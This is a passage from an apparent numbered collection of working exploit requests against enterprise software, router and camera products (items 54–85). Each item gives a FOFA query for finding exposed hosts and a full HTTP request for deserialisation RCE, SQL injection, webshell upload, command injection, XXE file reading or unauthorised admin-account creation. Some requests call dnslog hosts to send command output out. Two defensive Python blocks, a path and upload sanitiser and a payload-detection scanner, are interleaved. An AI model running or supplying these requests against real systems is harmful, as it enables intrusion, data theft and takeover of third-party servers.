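ATTACHMENT_DIR = "/srv/app/attachments"
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
SCRIPT_EXT = {"jsp", "jspx", "php", "phtml", "aspx", "asp"}


class PathRejected(ValueError):
    pass


def confine(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir; refuse anything that escapes it.

    Percent-decodes twice (item 53 sends ..%2F, and double encoding is a
    common variant), maps backslashes to slashes, rejects absolute and
    drive-letter paths, then normalises the joined path and checks that it
    is still strictly inside base_dir.
    """
    decoded = urllib.parse.unquote(urllib.parse.unquote(user_path))
    decoded = decoded.replace("\\", "/")
    if decoded.startswith("/") or re.match(r"^[A-Za-z]:", decoded):
        raise PathRejected(f"absolute path not allowed: {user_path!r}")
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, decoded))
    if target == base or posixpath.commonpath([base, target]) != base:
        raise PathRejected(f"path escapes {base_dir}: {user_path!r}")
    return target


def safe_upload_name(client_filename: str) -> str:
    """Reduce a client-supplied filename to one safe path component.

    Keeps only the last component (drops the \\webapps\\nc_web\\ and
    ./webapps/nc_web/ prefixes of items 24 and 35), strips trailing spaces
    and dots (item 49's "x.php " trick), replaces anything outside a small
    character set, and allow-lists the extension. There is deliberately no
    parameter to choose the extension: item 28's fileType=jsp is exactly
    the input a server must not honour.
    """
    name = client_filename.replace("\\", "/").split("/")[-1]
    name = name.rstrip(" .")
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_EXT:
        raise PathRejected(f"extension not allowed: {client_filename!r}")
    # shell.php.jpg: some servers pick the handler from an inner extension.
    if "." in stem and stem.rpartition(".")[2].lower() in SCRIPT_EXT:
        raise PathRejected(f"script extension inside name: {client_filename!r}")
    return f"{stem}.{ext.lower()}"


def store_path(client_filename: str) -> str:
    """On-disk path for an upload: sanitised name confined to UPLOAD_DIR."""
    return confine(UPLOAD_DIR, safe_upload_name(client_filename))


def is_rejected(func, arg) -> bool:
    """True when func(arg) raises PathRejected."""
    try:
        func(arg)
    except PathRejected:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs taken from the requests above.
    for p in ["../../../etc/passwd", "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
              "reports/2024/q1.pdf"]:
        print("read", repr(p), "->", "REJECTED" if is_rejected(
            lambda x: confine(ATTACHMENT_DIR, x), p) else confine(ATTACHMENT_DIR, p))
    for f in ["\\webapps\\nc_web\\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp", "./webapps/nc_web/1.jsp",
              "s.php ", "shell.php.jpg", "2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"]:
        print("upload", repr(f), "->", "REJECTED" if is_rejected(store_path, f) else store_path(f))
```

The containment check works on the normalised path rather than on the presence of "..", so encoded, doubled and backslash variants all collapse to the same answer. The extension is taken from the sanitised name and checked against an allow-list; a block-list of jsp/php would have let item 49's trailing-space name through on a server that trims it later.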

54. Chanjet (畅捷通) T+ GetStoreWarehouseByStore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below. The deserialised ObjectDataProvider gadget starts cmd with the arguments
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
which writes the marker string into a file in the application directory.

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
}
}
}
}

Step 2: request the following URL; the marker string in the response confirms execution:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ GetDecAllUsers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: send that Cookie with a request to
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c ping 6qevyvmi.dnslog.pw"
}
}
}
}

Same AjaxPro gadget chain as item 54, reached through a different handler; the ping to a dnslog host is the out-of-band confirmation.

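Items 22, 23, 25, 54 and 56 all deliver their payload as a recognisable marker inside the request body: a ${jndi:...} lookup string, a JNDI URL in a form parameter, a fastjson @type key, or an AjaxPro __type key naming the .NET ObjectDataProvider / System.Diagnostics.Process chain. A defender reviewing WAF or application logs can flag all of them without knowing each product. The following is an added example, not code from the original article or from any vendor: a body scanner that walks parsed JSON for polymorphic type hints and falls back to raw-text matching when the body is not valid JSON. That fallback is the point of item 23, whose body is deliberately malformed (the }"" tail) and would slip past any detector that gives up when json.loads fails. The sample bodies are constructed copies of those items plus one benign request; the DNS names are the placeholders used above.

```python
import json
import re

# Markers copied from the request bodies of items 22, 23, 25, 54 and 56.
JNDI_LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
JNDI_URL_PARAM_RE = re.compile(r"(?:^|[&?])\w+=(?:ldap|ldaps|rmi|iiop|dns)://", re.IGNORECASE)
FASTJSON_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
DOTNET_TYPE_RE = re.compile(r'"__type"\s*:\s*"([^"]+)"')

# Classes a fastjson probe asks for: harmless-looking JDK/fastjson types
# whose instantiation has a side effect (DNS lookup, JDBC connect).
FASTJSON_PROBE_TYPES = {
    "java.net.URL",
    "java.net.InetAddress",
    "java.net.Inet4Address",
    "com.sun.rowset.JdbcRowSetImpl",
    "com.alibaba.fastjson.JSONObject",
}
# The .NET ObjectDataProvider chain used by items 54 and 56.
DOTNET_GADGET_TYPES = {
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
    "System.Diagnostics.ProcessStartInfo",
}


def _collect_type_hints(node, hits):
    """Recursively gather (key, value) for every @type/__type key in a JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key in ("@type", "__type") and isinstance(value, str):
                hits.append((key, value))
            _collect_type_hints(value, hits)
    elif isinstance(node, list):
        for item in node:
            _collect_type_hints(item, hits)


def scan_body(body: str) -> list:
    """Return the indicator names found in one request body, in order."""
    findings = []
    if JNDI_LOOKUP_RE.search(body):
        findings.append("jndi-lookup-string")
    if JNDI_URL_PARAM_RE.search(body):
        findings.append("jndi-url-in-form-parameter")

    hints = []
    try:
        _collect_type_hints(json.loads(body), hints)
    except ValueError:
        # Item 23's body is not valid JSON (the `}""` trick), yet fastjson
        # still honours its @type hints, so fall back to the raw text.
        hints = [("@type", v) for v in FASTJSON_TYPE_RE.findall(body)]
        hints += [("__type", v) for v in DOTNET_TYPE_RE.findall(body)]

    for key, value in hints:
        if key == "@type":
            if value in FASTJSON_PROBE_TYPES:
                findings.append(f"fastjson-probe-type:{value}")
            else:
                findings.append(f"fastjson-type-hint:{value}")
        else:
            clr_type = value.split(",")[0].strip()  # drop the assembly-qualified tail
            if clr_type in DOTNET_GADGET_TYPES:
                findings.append(f"dotnet-gadget-type:{clr_type}")
            else:
                findings.append(f"dotnet-type-hint:{clr_type}")
    return findings


# Constructed sample bodies mirroring the items named above.
SAMPLES = {
    "item22": '{"loginName":"${jndi:ldap://dnslog}"}',
    "item23": '{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
              '{"@type":"java.net.URL","val":"http://DNSLOG"}}""}',
    "item25": "type=1&dsname=ldap://dnslog/",
    "item56": '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
              'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start",'
              '"ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, '
              'Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":'
              '"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
              'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c ping dnslog"}}}}',
    "benign": '{"storeID":"1001","page":1}',
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, scan_body(body))
```

An @type or __type key is never needed by a well-behaved client of these endpoints, so any hit is worth an alert; the probe-type and gadget-type findings are the ones that confirm an exploit attempt rather than a scanner guess.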
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Error-based: comparing 1 with the string returned by @@version fails the int conversion, and SQL Server echoes the version string in the error message.

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Success is indicated by the MD5 of 123456 (e10adc3949ba59abbe56e057f20f883e) appearing in the conversion error.

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA:title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

The endpoint is the PrimeFaces dynamiccontent.properties resource, i.e. the PrimeFaces EL-injection issue (CVE-2017-1000486) reached through a bundled application; the fix is an updated PrimeFaces, not an application patch.

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetOSpById xmlns="http://tempuri.org/">
<sId>1';waitfor delay '0:0:5'--+</sId>
</GetOSpById>
</soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, dir gives the path it is written to, and fileType gives the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
